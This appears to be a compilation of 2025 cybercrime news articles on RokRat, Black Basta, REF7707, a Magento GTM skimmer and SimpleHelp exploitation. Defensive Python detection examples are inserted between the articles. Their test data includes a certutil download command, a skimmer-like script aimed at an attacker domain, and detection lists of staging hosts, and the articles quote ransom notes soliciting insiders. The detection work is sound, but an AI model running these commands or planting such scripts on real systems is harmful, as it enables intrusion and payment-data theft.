
Cybercrime in 2025: AI-Powered Attacks, Identity Exploits, and the Rise of Nation-State Threats

 


Cybercrime has evolved beyond traditional hacking into a highly organized and sophisticated industry. In 2025, cyber adversaries, from financially motivated criminals to nation-state actors, are leveraging AI, identity-based attacks, and cloud exploitation to breach even well-defended organizations. The 2025 CrowdStrike Global Threat Report highlights how cybercriminals now operate like businesses.

One of the fastest-growing trends is Access-as-a-Service, where initial access brokers infiltrate networks and sell entry points to ransomware groups and other malicious actors. The shift from traditional malware to identity-based attacks is accelerating: 79% of the detections CrowdStrike observed were malware-free, with intruders relying on valid credentials and legitimate remote administration tools instead of malicious software. Attackers are also moving faster than ever. The average breakout time (how long an intruder takes to move laterally after the initial compromise) has hit a record low of 48 minutes, and the fastest observed intrusion spread in just 51 seconds.

This efficiency is fueled by AI-driven automation, which makes intrusions more effective and harder to detect. AI has also revolutionized social engineering: AI-generated phishing emails now achieve a 54% click-through rate, compared with just 12% for human-written ones. Deepfake technology is being used in business email compromise scams, including a $25.6 million fraud built around an AI-generated video call. More alarming still, North Korean operators have used AI to create fake LinkedIn profiles and manipulate job interviews, gaining insider access to corporate networks as employees.

The rise of AI in cybercrime is mirrored by increasingly sophisticated nation-state operations. China in particular has expanded its offensive capabilities, with a 150% increase in China-nexus activity targeting the finance, manufacturing, and media sectors. Groups like Vanguard Panda are embedding themselves in critical infrastructure networks, potentially pre-positioning for geopolitical conflict.

As perimeter-only security loses its value, organizations must shift to identity-focused protection. Cybercriminals are exploiting cloud weaknesses, driving a 35% rise in cloud intrusions, while access broker activity has surged 50%, a measure of how valuable stolen credentials have become.

To counter these threats, enterprises need continuous identity monitoring, AI-assisted threat detection, and cross-domain visibility across endpoint, identity, and cloud. As adversaries keep innovating, businesses must stay ahead or risk becoming the next target in this rapidly evolving digital battlefield.

North Korean Hackers Exploit ZIP Files in Sophisticated Cyber Attacks

 

State-sponsored hacking group APT37 (ScarCruft) is deploying advanced cyber-espionage tactics to infiltrate systems using malicious ZIP files containing LNK shortcuts. These files are typically disguised as documents related to North Korean affairs or trade agreements and are spread through phishing emails.

Once opened, the attack unfolds in multiple stages, leveraging PowerShell scripts and batch files to install the RokRat remote access Trojan (RAT) as the final payload.

The infection starts with carefully crafted phishing emails, often using real information from legitimate websites to enhance credibility. These emails contain malicious ZIP attachments housing LNK files. When executed, the LNK file verifies its directory path, relocating itself to %temp% if necessary.

It then extracts multiple components, including:

  • A decoy HWPX document
  • A batch script (shark.bat)
  • Additional payloads, caption.dat and elephant.dat

The shark.bat script quietly executes PowerShell commands that launch the elephant.dat script, which decrypts caption.dat using an XOR key. The decrypted content is then executed in memory, ultimately deploying the RokRat RAT.
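As an added illustration (this is my own example code, not APT37's tooling and not from the original write-up), the script below does the two things an analyst does first with a lure like this: open the ZIP and identify LNK members by their file header rather than trusting the extension, then strip a repeating-key XOR from a staged blob the way the elephant.dat step is described as doing. The archive contents, the LNK stub, the stand-in payload and the key "demo-key" are all constructed for the demo; the real key and file layout are not given in the post.

```python
"""Added example (not APT37 tooling, not from the original post): triage a ZIP
attachment for LNK droppers and decode an XOR-obscured staged blob.
The archive, the LNK stub and the XOR key are constructed for the demo."""
import io
import zipfile

# Windows Shell Link (.lnk) files begin with HeaderSize 0x4C followed by the
# LinkCLSID 00021401-0000-0000-C000-000000000046 in little-endian GUID layout.
LNK_MAGIC = bytes.fromhex("4c000000") + bytes.fromhex("0114020000000000c000000000000046")


def is_lnk(data: bytes) -> bool:
    """True when the bytes carry the Shell Link header, whatever the file is called."""
    return data[: len(LNK_MAGIC)] == LNK_MAGIC


def triage_zip(zip_bytes: bytes) -> list[dict]:
    """Return one finding per archive member that is (or hides) a Shell Link.

    The name check catches 'document.hwpx.lnk'; the header check catches a
    LNK renamed to something harmless such as 'readme.txt'.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            data = zf.read(info)
            by_name = info.filename.lower().endswith(".lnk")
            by_header = is_lnk(data)
            if by_name or by_header:
                findings.append({
                    "member": info.filename,
                    "double_extension": info.filename.lower().count(".") > 1,
                    "renamed_lnk": by_header and not by_name,
                    "size": len(data),
                })
    return findings


def xor_decrypt(blob: bytes, key: bytes) -> bytes:
    """Repeating-key XOR, the scheme the post attributes to the caption.dat stage."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(blob))


def build_sample_zip() -> bytes:
    """Constructed lure archive: decoy document, double-extension LNK, a LNK hiding
    behind a .txt name, and an XOR-obscured 'caption.dat' (stand-in payload)."""
    key = b"demo-key"                                   # assumption, not the real key
    payload = b"Write-Host 'stage two would run here'"  # stand-in, not RokRat
    lnk_stub = LNK_MAGIC + b"\x00" * 60
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Trade_Agreement.hwpx", b"decoy document bytes")
        zf.writestr("Trade_Agreement.hwpx.lnk", lnk_stub)
        zf.writestr("readme.txt", lnk_stub)
        zf.writestr("caption.dat", xor_decrypt(payload, key))
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_zip()
    for finding in triage_zip(sample):
        print(finding)
    with zipfile.ZipFile(io.BytesIO(sample)) as zf:
        print(xor_decrypt(zf.read("caption.dat"), b"demo-key"))
```

Point the same two helpers at a real attachment and a carved .dat file; the header check is the one that matters, because mail gateways that only look at extensions are exactly what the renamed-LNK trick is for.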

Once active, RokRat collects detailed system information, such as:
  • Operating system version
  • Computer name
  • Logged-in user details
  • Running processes
  • Screenshots of the infected system

The stolen data is then exfiltrated to command-and-control (C2) servers via legitimate cloud services such as pCloud, Yandex, and Dropbox, using their APIs to upload, download, and delete files, with OAuth tokens embedded in the malware so the traffic looks like ordinary authenticated cloud use.

RokRat also allows attackers to execute remote commands, conduct system reconnaissance, and terminate processes. To avoid detection, it implements anti-analysis techniques, including:
  • Detecting virtual environments by checking for VMware Tools
  • Sandbox detection by creating and deleting temporary files
  • Debugger detection using IsDebuggerPresent

The malware encrypts outbound data with XOR and RSA, while C2 commands arrive AES-CBC encrypted, are decrypted locally, and are then executed on the compromised system. These commands drive data collection, file deletion, and self-termination of the malware.

By leveraging legitimate cloud services, RokRat seamlessly blends into normal network traffic, making detection more challenging.

“This sophisticated approach highlights the evolving tactics of APT37, as they continue to adapt and expand their operations beyond traditional targets, now focusing on both Windows and Android platforms through phishing campaigns.”

As APT37 refines its cyberattack strategies, organizations must remain vigilant against such persistent threats and enhance their cybersecurity defenses.

University of Notre Dame Hit by Cyberattack, Hackers Say They Stole Everything

 



The Fog ransomware group has claimed responsibility for a cyberattack on the University of Notre Dame in Perth, Australia. According to reports, the group claims to have stolen 62.2GB of sensitive data, including student medical records, staff and student contact information, and confidential documents.


Hackers Announce Data Theft on the Dark Web  

The university was first alerted to a cybersecurity breach in January 2025. Recently, technology news sources revealed that Fog Ransomware had posted details of the attack on its dark web leak site. The group claimed to have accessed and stolen a large amount of private and institutional information.  

As of now, the hackers have not made any ransom demands or issued a deadline for payment. Cybersecurity experts believe that this group has a history of targeting educational and recreational institutions worldwide.  


How the Attack Has Affected the University  

The cyberattack has disrupted essential university operations, making it difficult for students and staff to access key services. Some of the areas impacted include:  

1. Payroll and leave management – Employees have been unable to process payments and leave applications as usual. Temporary manual processes have been put in place.  

2. Student enrolments and timetables – Many students have struggled to access their class schedules and register for courses.  

3. Communication services – Internet and email systems have also been affected, causing delays in official university communication.  

University official Patrick Hampton, who is both the Deputy Head of Education and President of the National Tertiary Education Union WA Notre Dame branch, stated that the attack had disrupted critical functions necessary for the university’s daily operations. He also emphasized that staff and students need additional support to cope with these challenges.  


Uncertainty Over the Full Extent of the Data Breach  

At this stage, the university has not been able to confirm exactly what data has been stolen. A spokesperson explained that while primary systems handling student records, finance, and human resources appear secure, some separately stored data might have been compromised.  

To assess the situation, the university has engaged international cybersecurity experts and is working to determine the extent of the breach. Officials have assured that if any personal data is found to be affected, the university will notify those impacted as soon as possible.  


Response and Future Actions

The incident has been reported to the Australian Cyber Security Centre (ACSC), and the university is taking necessary precautions to strengthen its security measures. Despite the ongoing challenges, the university has confirmed that classes for the 2025 academic year will begin as scheduled.  

Meanwhile, the staff union is pushing for greater transparency from the university administration. They are demanding that university leadership keep staff and students fully informed about what data has been compromised and provide assurances about data protection measures moving forward.  

This attack is a reminder of the increasing cybersecurity threats faced by educational institutions. Universities hold vast amounts of sensitive student and staff data, making them prime targets for cybercriminals. 

Internal Chat Logs of Black Basta Ransomware Gang Leaked Online

 

A previously unidentified source has leaked what is claimed to be an archive of internal Matrix chat logs linked to the Black Basta ransomware group. The individual behind the leak, known as ExploitWhispers, initially uploaded the stolen messages to the MEGA file-sharing platform, which has since taken them down. However, they have now made the archive available through a dedicated Telegram channel.

It remains uncertain whether ExploitWhispers is a cybersecurity researcher who infiltrated the group's internal chat server or a discontented member of the operation. While no specific reason was provided for the leak, cybersecurity intelligence firm PRODAFT suggested that it could be a direct consequence of the ransomware gang’s alleged attacks on Russian banks.

"As part of our continuous monitoring, we've observed that BLACKBASTA (Vengeful Mantis) has been mostly inactive since the start of the year due to internal conflicts. Some of its operators scammed victims by collecting ransom payments without providing functional decryptors," PRODAFT stated.

"On February 11, 2025, a major leak exposed BLACKBASTA's internal Matrix chat logs. The leaker claimed they released the data because the group was targeting Russian banks. This leak closely resembles the previous Conti leaks."

The leaked archive contains internal chat messages exchanged between September 18, 2023, and September 28, 2024. A review conducted by BleepingComputer reveals that the messages encompass a broad range of sensitive information, including phishing templates, email addresses for targeting, cryptocurrency wallets, data dumps, victims' login credentials, and confirmations of previously reported attack strategies.

Additionally, the leaked records contain 367 unique ZoomInfo links, potentially reflecting the number of organizations targeted during the specified timeframe. Ransomware groups frequently use ZoomInfo to gather intelligence on their targets, either internally or for negotiations with victims.

ExploitWhispers also disclosed information about key Black Basta members, identifying Lapa as an administrator, Cortes as a threat actor connected to the Qakbot malware group, and YY as the primary administrator. Another individual, referred to as Trump (also known as GG and AA), is believed to be Oleg Nefedov, who is suspected of leading the operation.

Black Basta operates as a Ransomware-as-a-Service (RaaS) group, first emerging in April 2022. The gang has targeted several high-profile organizations across various industries, including healthcare, government contractors, and major corporations.

Notable victims include German defense contractor Rheinmetall, Hyundai's European division, BT Group (formerly British Telecom), U.S. healthcare provider Ascension, government contractor ABB, the American Dental Association, U.K. tech outsourcing firm Capita, the Toronto Public Library, and Yellow Pages Canada.

A joint report from CISA and the FBI, published in May 2024, revealed that Black Basta affiliates compromised more than 500 organizations between April 2022 and May 2024.

Research from Corvus Insurance and Elliptic estimates that the ransomware gang collected approximately $100 million in ransom payments from over 90 victims by November 2023.

This incident bears similarities to the February 2022 data breach involving the Russian-based Conti cybercrime syndicate. At that time, a Ukrainian security researcher leaked over 170,000 internal chat messages and the source code for the Conti ransomware encryptor, following the group's public support for Russia amid the Ukraine conflict.

Hackers Target South America and Southeast Asia

 



A group of hackers has been caught running a large-scale cyber-espionage operation, now tracked as REF7707. The activity was first noticed in November 2024 when unusual behaviour was detected in the Foreign Ministry of a South American country. As researchers dug deeper, they found that the same hackers had also targeted several other organizations in Southeast Asia.

The attackers used advanced hacking tools to break into computer systems, steal information, and stay hidden for a long time. However, even though they were highly skilled, they made serious mistakes that exposed their operation.  


The Malicious Software Used in the Attack  

The hackers used three main types of malware (harmful programs) to infect computers and control them remotely:  

FINALDRAFT: A Hidden Control System 

One of the key tools in this attack was FINALDRAFT, a remote access tool that let the hackers secretly control a computer. Once installed, they could:

  • Run commands: the infected computer could be made to perform actions such as downloading more malware or collecting sensitive files.
  • Hide inside normal programs: the malicious code was injected into everyday processes such as MS Paint (mspaint.exe), making it harder for security software to spot.
  • Use Microsoft's online services: command-and-control traffic went through the Microsoft Graph API, a service businesses commonly use, so the malicious activity blended in with normal traffic.


GUIDLOADER and PATHLOADER: Sneaky Installers

These two programs acted as delivery tools that installed FINALDRAFT on infected computers. Instead of storing dangerous files on a computer’s hard drive (where they could be detected), they loaded the malware directly into the computer’s memory. This method helps cybercriminals avoid antivirus scans.  

To further cover their tracks, they hosted their malware downloads on trusted services, including:

1. Google Firebase (a cloud service used by developers)  

2. Pastebin (a site often used to store and share text)  

3. Web storage systems of Southeast Asian universities  

By using trusted websites, they made it harder for security systems to recognize the attack.  


Hackers Misused Windows Tools to Spread  

Instead of only relying on their own hacking tools, the attackers took advantage of built-in Windows programs to spread across networks:  

  • Certutil.exe: a program designed to manage security certificates, which the hackers misused to download (and decode) their malware.
  • Windows Remote Management (WinRM): a legitimate Windows tool that lets administrators control computers remotely. The hackers used it to jump from one system to another, which means they had already obtained valid credentials.

By using tools that were already part of Windows, they avoided setting off alarms that custom-made malware might trigger.  
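Added example, mine rather than Elastic's detection content or anything from the original report: a few detection rules for the behaviours just described (certutil fetching from a paste or file-hosting site, Microsoft Graph traffic from a process that has no business talking to it, WinRM initiated from a workstation), run over a handful of constructed Sysmon-style events. The host names, command lines, the staging-host list, the Graph allowlist and the "ws*" workstation naming are assumptions for the demo.

```python
"""Added example, not from the original report: REF7707-style detection rules run
over constructed Sysmon-style telemetry.  Hosts, command lines and allowlists are
assumptions for the demo."""
import re

# Constructed telemetry (not real logs): process-creation and network events.
EVENTS = [
    {"type": "process", "host": "ws01", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f https://pastebin.com/raw/abc123 C:\\Users\\Public\\st.dat"},
    {"type": "process", "host": "ws01", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -decode C:\\Users\\Public\\st.dat C:\\Users\\Public\\st.dll"},
    {"type": "process", "host": "ws01", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -verify server.cer"},                        # legitimate use
    {"type": "network", "host": "ws01", "image": r"C:\Windows\System32\mspaint.exe",
     "dest_host": "graph.microsoft.com", "dest_port": 443},                # FINALDRAFT-style C2
    {"type": "network", "host": "ws01", "image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "dest_host": "graph.microsoft.com", "dest_port": 443},                # expected Graph user
    {"type": "network", "host": "ws01", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "dest_host": "srv02.corp.local", "dest_port": 5985},                  # WinRM lateral movement
]

# certutil used as a downloader (-urlcache) or base64 decoder (-decode).
CERTUTIL_ABUSE = re.compile(r"certutil(?:\.exe)?\s+.*?-(urlcache|decode)\b", re.IGNORECASE)
URL_HOST = re.compile(r"https?://([^/\s]+)", re.IGNORECASE)
# Assumption: hosting services named in the write-up; extend for your estate.
STAGING_HOSTS = ("pastebin.com", "firebaseio.com", "firebasestorage.googleapis.com")
# Assumption: the only processes expected to talk to Microsoft Graph here.
GRAPH_ALLOWED = {"outlook.exe", "teams.exe", "ms-teams.exe", "onedrive.exe"}
WINRM_PORTS = {5985, 5986}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(events) -> list[tuple]:
    """Return (rule, host, detail) for each event that trips a rule."""
    alerts = []
    for ev in events:
        if ev["type"] == "process" and basename(ev["image"]) == "certutil.exe":
            if CERTUTIL_ABUSE.search(ev["cmdline"]):
                hosts = [h.lower() for h in URL_HOST.findall(ev["cmdline"])]
                staged = any(h.endswith(STAGING_HOSTS) for h in hosts)
                rule = "certutil_fetch_from_staging_host" if staged else "certutil_download_or_decode"
                alerts.append((rule, ev["host"], ev["cmdline"]))
        elif ev["type"] == "network":
            proc = basename(ev["image"])
            if ev["dest_host"] == "graph.microsoft.com" and proc not in GRAPH_ALLOWED:
                alerts.append(("graph_api_from_unexpected_process", ev["host"], proc))
            # Assumption: hosts named ws* are workstations, which should not drive WinRM.
            if ev["dest_port"] in WINRM_PORTS and ev["host"].startswith("ws"):
                alerts.append(("winrm_from_workstation", ev["host"],
                               f"{proc} -> {ev['dest_host']}:{ev['dest_port']}"))
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

The Graph rule is the one worth tuning: the whole point of abusing a Microsoft API for C2 is that the destination is allowlisted everywhere, so the only useful signal is which process opened the connection, not where it went.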


How the Hackers Were Caught  

Even though REF7707 was a well-planned attack, the hackers made several big mistakes that helped cybersecurity experts uncover their activities.  

Key Errors They Made:

1. Left behind test versions of their malware: Some samples contained error messages and incomplete code, revealing how they built their attack.  

2. Exposed their own websites: Many of their fake websites remained open and accessible, allowing experts to track their movements.  

3. Messed up their encryption: Some malware was poorly coded, which made it easier for researchers to analyze and understand how it worked.  


Tracing the Hackers’ Footsteps  

By following these mistakes, security researchers tracked the hackers’ network of fake websites and compromised services. Some of the suspicious domains they discovered included:  

1. digert.ictnsc[.]com

2. support.vmphere[.]com  

3. hobiter[.]com and vm-clouds[.]net, which shared the same setup, suggesting they were controlled by the same group.  

The attackers also abused Microsoft’s services to make their hacking traffic look like normal company activity.  


What We Can Learn from This Attack

REF7707 is a clear example of how cybercriminals use sophisticated tricks to break into important systems, stay hidden, and steal data. But it also proves that even expert hackers can make mistakes, and when they do, security teams can use those errors to track them down.

Hackers are constantly improving their tactics, but as this case shows, cybersecurity experts are also getting better at catching them.  


Cybercriminals Exploit Google Tag Manager to Steal Payment Data from Magento Sites

 

Cybercriminals have been leveraging Google Tag Manager (GTM) to inject malware into Magento-powered eCommerce websites, compromising customer payment data, according to cybersecurity experts.

Security researchers at Sucuri recently investigated a live attack in which a Magento-based online store suffered a credit card data breach. The investigation led to a malicious script loaded through Google Tag Manager which, while appearing to be a standard tracking tag, was designed to steal sensitive payment information.

Google Tag Manager is a widely used tag management system that lets website owners deploy tracking code without modifying the site's own code. In this case the attackers added a tag whose script was obfuscated, making detection difficult. The script captured payment details at checkout and transmitted them to a remote server. Researchers also found a backdoor on the site that gave the attackers persistent access.

At least six websites were found infected with the same GTM ID, and one domain used in the attack, eurowebmonitortool[dot]com, has now been blacklisted by major security firms. Cybersecurity experts emphasize that this attack method is not new. Sucuri researchers had previously identified similar threats, reaffirming that this technique is "still being widely used."

Given its popularity among eCommerce businesses, Magento remains a primary target for cybercriminals. Stolen payment data can be exploited for fraudulent purchases, malvertising campaigns, and other illicit activities.

Security Measures for Protection

To mitigate risks, website administrators should:

  • Remove any suspicious GTM tags
  • Conduct a full security scan
  • Ensure Magento and all extensions are updated
  • Regularly monitor site traffic and GTM configurations for anomalies

Proactive cybersecurity measures and ongoing vulnerability monitoring are crucial to safeguarding eCommerce platforms from such sophisticated attacks.
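Added example (my own code, not Sucuri's scanner and not from the original post) for the last point above: audit a GTM container export for Custom HTML tags that look like the skimmer, i.e. obfuscation helpers such as eval/atob, long base64 literals, references to card fields, and URLs pointing at hosts outside an allowlist. The container JSON is constructed; its layout (containerVersion -> tag[] -> parameter[] with key "html") follows the GTM container export format as I understand it, so check it against a real export before relying on it. The host allowlist is an assumption, and the flagged domain is the one the post names.

```python
"""Added example (not Sucuri's tooling, not from the original post): audit a
Google Tag Manager container export for skimmer-like Custom HTML tags.
The export below is constructed; its layout follows the GTM container export
format as I understand it (verify against a real export)."""
import json
import re

SAMPLE_EXPORT = json.dumps({
    "exportFormatVersion": 2,
    "containerVersion": {
        "containerId": "1234567",
        "tag": [
            {"tagId": "1", "name": "GA4 Config", "type": "gaawc",
             "parameter": [{"type": "TEMPLATE", "key": "measurementId", "value": "G-XXXXXXX"}]},
            {"tagId": "2", "name": "Checkout helper", "type": "html",
             "parameter": [{"type": "TEMPLATE", "key": "html", "value":
                 "<script>eval(atob('ZG9jdW1lbnQuYWRkRXZlbnRMaXN0ZW5lcg=='));"
                 "var u='https://eurowebmonitortool.com/gate';"
                 "document.querySelector('input[name=cc_number]');</script>"}]},
            {"tagId": "3", "name": "Newsletter popup", "type": "html",
             "parameter": [{"type": "TEMPLATE", "key": "html", "value":
                 "<script src='https://cdn.example-vendor.com/popup.js'></script>"}]},
        ],
    },
})

OBFUSCATION_MARKERS = ("eval(", "atob(", "unescape(", "fromCharCode", "document.write(")
PAYMENT_FIELD_RE = re.compile(r"\b(cc_?number|card_?number|cvv|cvc|exp(?:iry|_month|_year)?)\b", re.I)
URL_HOST_RE = re.compile(r"https?://([a-z0-9.-]+)", re.I)
BASE64_RUN_RE = re.compile(r"[A-Za-z0-9+/]{30,}={0,2}")
# Assumption: the only third-party hosts this store's tags are allowed to reference.
ALLOWED_HOSTS = {"www.googletagmanager.com", "www.google-analytics.com", "cdn.example-vendor.com"}


def custom_html_tags(export_json: str):
    """Yield (tag, html) for every Custom HTML tag in the container export."""
    container = json.loads(export_json)["containerVersion"]
    for tag in container.get("tag", []):
        if tag.get("type") != "html":
            continue
        html = next((p["value"] for p in tag.get("parameter", []) if p.get("key") == "html"), "")
        yield tag, html


def audit_container(export_json: str) -> list[dict]:
    """Return the Custom HTML tags that show skimmer traits, with the reasons."""
    findings = []
    for tag, html in custom_html_tags(export_json):
        reasons = []
        markers = [m for m in OBFUSCATION_MARKERS if m in html]
        if markers:
            reasons.append("obfuscation:" + ",".join(markers))
        if BASE64_RUN_RE.search(html):
            reasons.append("long_base64_literal")
        if PAYMENT_FIELD_RE.search(html):
            reasons.append("touches_payment_fields")
        unknown = sorted({h.lower() for h in URL_HOST_RE.findall(html)} - ALLOWED_HOSTS)
        if unknown:
            reasons.append("unknown_hosts:" + ",".join(unknown))
        if reasons:
            findings.append({"tagId": tag["tagId"], "name": tag["name"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in audit_container(SAMPLE_EXPORT):
        print(finding)
```

Run this against each container export on a schedule and diff the results; a Custom HTML tag that newly trips any reason, or a GTM container ID on the page that is not yours, is the cheapest early warning for this class of compromise.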

Cybercriminals Intensify Attacks on Password Managers

 

Cybercriminals are increasingly setting their sights on password managers as a way to infiltrate critical digital accounts.

According to Picus Security’s Red Report 2025, which analyzed over a million malware samples from the past year, a quarter (25%) of all malware now targets credentials stored in password managers. Researchers noted that this marks a threefold surge compared to the previous year.

“For the first time ever, stealing credentials from password stores is in the top 10 techniques listed in the MITRE ATT&CK Framework,” they said. “The report reveals that these top 10 techniques accounted for 93% of all malicious actions in 2024.”

Advanced Hacking Techniques

Dr. Suleyman Ozarslan, co-founder and VP of Picus Labs, revealed that cybercriminals use sophisticated methods like memory scraping, registry harvesting, and breaching both local and cloud-based password stores to extract credentials.

To counter this rising threat, Ozarslan emphasized the importance of using password managers alongside multi-factor authentication (MFA). He also warned against password reuse, particularly for the password manager itself.

Beyond the growing frequency of attacks, hackers are also deploying more advanced techniques. Picus Security highlighted that modern cybercriminals are now favoring long-term, multi-stage attacks that leverage a new generation of malware. These advanced infostealers are designed for stealth, persistence, and automation.

Researchers compared this evolution in cyber threats to “the perfect heist,” noting that most malware samples execute over a dozen malicious actions to bypass security defenses, escalate privileges, and exfiltrate data.

A password manager is a cybersecurity tool that securely stores, generates, and auto-fills strong passwords across websites and apps. By eliminating the need to remember multiple passwords, it strengthens security and reduces the risk of breaches. Experts consider it an essential component of cybersecurity best practices.

Hackers Exploit SimpleHelp RMM Vulnerabilities to Deploy Backdoors and Create Admin Accounts

 

Hackers are exploiting vulnerabilities in SimpleHelp Remote Monitoring and Management (RMM) clients to gain administrative control, install backdoors, and possibly set the stage for ransomware deployment.

The vulnerabilities, identified as CVE-2024-57726, CVE-2024-57727, and CVE-2024-57728, were initially flagged by Arctic Wolf as potential attack vectors last week. While the firm could not verify active exploitation, cybersecurity company Field Effect has now confirmed their abuse in ongoing cyberattacks.

Field Effect shared its findings with BleepingComputer, highlighting that the attack patterns bear similarities to Akira ransomware activity. However, researchers lack definitive evidence to attribute these attacks with high confidence.

The breach begins when attackers exploit SimpleHelp RMM vulnerabilities to gain unauthorized access to a target system. The initial connection originates from IP address 194.76.227[.]171, linked to an Estonian server running a SimpleHelp instance on port 80.

Once inside, the attackers execute reconnaissance commands to gather information on system architecture, user privileges, network configurations, scheduled tasks, services, and Domain Controller (DC) details. Researchers also observed a specific command attempting to identify the CrowdStrike Falcon security suite, likely as part of an evasion strategy.

Leveraging this access, the hackers create a new administrator account ("sqladmin") to maintain persistence. They then deploy Sliver, a post-exploitation framework increasingly used as an alternative to Cobalt Strike now that security tools frequently detect the latter; the implant was dropped as agent.exe.

Once executed, Sliver connects to a command-and-control (C2) server in the Netherlands, allowing remote command execution. Field Effect also discovered a backup IP with Remote Desktop Protocol (RDP) enabled, indicating additional persistence measures.

After securing initial access, the attackers escalate by compromising the Domain Controller (DC) via the same SimpleHelp RMM client. They create another admin account ("fpmhlttech") and, instead of deploying a conventional backdoor, install a Cloudflare Tunnel client renamed to look like Windows' svchost.exe, which lets them bypass security controls and keep stealthy access.

To safeguard against these threats, SimpleHelp users must immediately apply security updates addressing CVE-2024-57726, CVE-2024-57727, and CVE-2024-57728. Users should also:

  • Audit admin accounts: Look for unauthorized accounts like "sqladmin" and "fpmhlttech".
  • Monitor network connections: Check for any connections to suspicious IPs flagged in Field Effect’s report.
  • Restrict RMM access: Limit SimpleHelp usage to trusted IP ranges to prevent unauthorized logins.

By following these security measures, organizations can mitigate risks associated with SimpleHelp RMM vulnerabilities and prevent potential ransomware attacks.
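Added example (mine, not Field Effect's tooling and not from the original post) of the first two checks above: diff the Administrators group against a known-good baseline, flag the two account names from the report, look for svchost.exe running from outside the system directory or under the wrong parent, and match outbound connections against the source IP the report cites. The snapshots are constructed; on a real Windows host you would feed these functions the output of Get-LocalGroupMember Administrators, a process listing with image paths and parent names, and Get-NetTCPConnection.

```python
"""Added example, not Field Effect's tooling and not from the original post:
persistence checks for the pattern described above, over constructed snapshots."""

# Constructed snapshot of the local Administrators group at a known-good time
# and now (on a real host: Get-LocalGroupMember Administrators).
BASELINE_ADMINS = {"Administrator", "CORP\\Domain Admins", "CORP\\it-ops"}
CURRENT_ADMINS = {"Administrator", "CORP\\Domain Admins", "CORP\\it-ops",
                  "sqladmin", "fpmhlttech"}

# Constructed process list: (name, image path, parent process name).
CURRENT_PROCESSES = [
    ("svchost.exe", r"C:\Windows\System32\svchost.exe", "services.exe"),
    ("svchost.exe", r"C:\Users\Public\svchost.exe", "explorer.exe"),   # tunnel client in disguise
    ("agent.exe", r"C:\ProgramData\agent.exe", "cmd.exe"),               # implant name from the report
    ("explorer.exe", r"C:\Windows\explorer.exe", "userinit.exe"),
]

# Constructed connection table: (process name, remote IP, remote port).
CURRENT_CONNECTIONS = [
    ("agent.exe", "194.76.227.171", 80),
    ("msedge.exe", "203.0.113.10", 443),
]

KNOWN_ROGUE_ACCOUNTS = {"sqladmin", "fpmhlttech"}   # names from the report
IOC_IPS = {"194.76.227.171"}                         # source IP from the report
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# System binaries attackers like to impersonate -> the parent they normally run under.
EXPECTED_PARENT = {"svchost.exe": "services.exe"}


def audit_admins(baseline: set, current: set) -> dict:
    """Diff privileged-group membership against the baseline."""
    added = current - baseline
    return {
        "added": sorted(added),
        "removed": sorted(baseline - current),
        "known_rogue": sorted(a for a in added if a.lower() in KNOWN_ROGUE_ACCOUNTS),
    }


def find_masquerades(processes) -> list[tuple]:
    """Flag system-binary names running from the wrong directory or under the wrong
    parent, plus the implant file name the report mentions."""
    hits = []
    for name, path, parent in processes:
        lname = name.lower()
        if lname in EXPECTED_PARENT:
            right_dir = path.lower().startswith(SYSTEM_DIRS)
            right_parent = parent.lower() == EXPECTED_PARENT[lname]
            if not right_dir:
                hits.append((name, path, "wrong_dir"))
            elif not right_parent:
                hits.append((name, path, "wrong_parent"))
        elif lname == "agent.exe":
            hits.append((name, path, "implant_name_from_report"))
    return hits


def find_ioc_connections(connections) -> list[tuple]:
    """Return connections whose remote address is a known indicator."""
    return [c for c in connections if c[1] in IOC_IPS]


if __name__ == "__main__":
    print(audit_admins(BASELINE_ADMINS, CURRENT_ADMINS))
    for hit in find_masquerades(CURRENT_PROCESSES):
        print(hit)
    for conn in find_ioc_connections(CURRENT_CONNECTIONS):
        print(conn)
```

The baseline diff is the durable part: the account names and IP in the report will change with the next campaign, but a new member of Administrators that nobody can account for, or an svchost.exe whose parent is not services.exe, does not depend on knowing the attacker in advance.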

Cybercriminals Entice Insiders with Ransomware Recruitment Ads

 

Cybercriminals are adopting a new strategy in their ransomware demands—embedding advertisements to recruit insiders willing to leak company data.

Threat intelligence researchers at GroupSense recently shared their findings with Dark Reading, highlighting this emerging tactic. According to their analysis, ransomware groups such as Sarcoma and DoNex—believed to be impersonating LockBit—have started incorporating these recruitment messages into their ransom notes.

A typical ransom note includes standard details about the company’s compromised state, data breaches, and backup destruction. However, deeper into the message, these groups introduce an unusual proposition:

"If you help us find this company's dirty laundry you will be rewarded. You can tell your friends about us. If you or your friend hates his boss, write to us and we will make him cry and the real hero will get a reward from us."

In another instance, the ransom note offers financial incentives:

"Would you like to earn millions of dollars $$$? Our company acquires access to networks of various companies, as well as insider information that can help you steal the most valuable data of any company. You can provide us accounting data for the access to any company, for example, login and password to RDP, VP, corporate email, etc."

The note then instructs interested individuals on how to install malicious software on their workplace systems, with communication facilitated via Tox messenger to maintain anonymity.

Kurtis Minder, CEO and founder of GroupSense, stated that while his team regularly examines ransom notes during incident response, the inclusion of these “pseudo advertisements” is a recent development.

"I've been asking my team and kind of speculating as to why this would be a good place to put an advertisement," said Minder. "I don't know the right answer, but obviously these notes do get passed around." He further noted that cybercriminals often experiment with new tactics, and once one group adopts an approach, others tend to follow suit.

For anyone tempted to respond to these offers, Minder warns of the significant risks involved: "These folks have no accountability, so there's no guarantee you would get paid anything. You trying to capitalize on this is pretty risky from an outcome perspective."

GroupSense continues to analyze past ransomware communications for any early signs of this trend. Minder anticipates discovering more instances of these ads in upcoming investigations.

Fake Wedding Invitations Used to Hack Phones in Southeast Asia

 



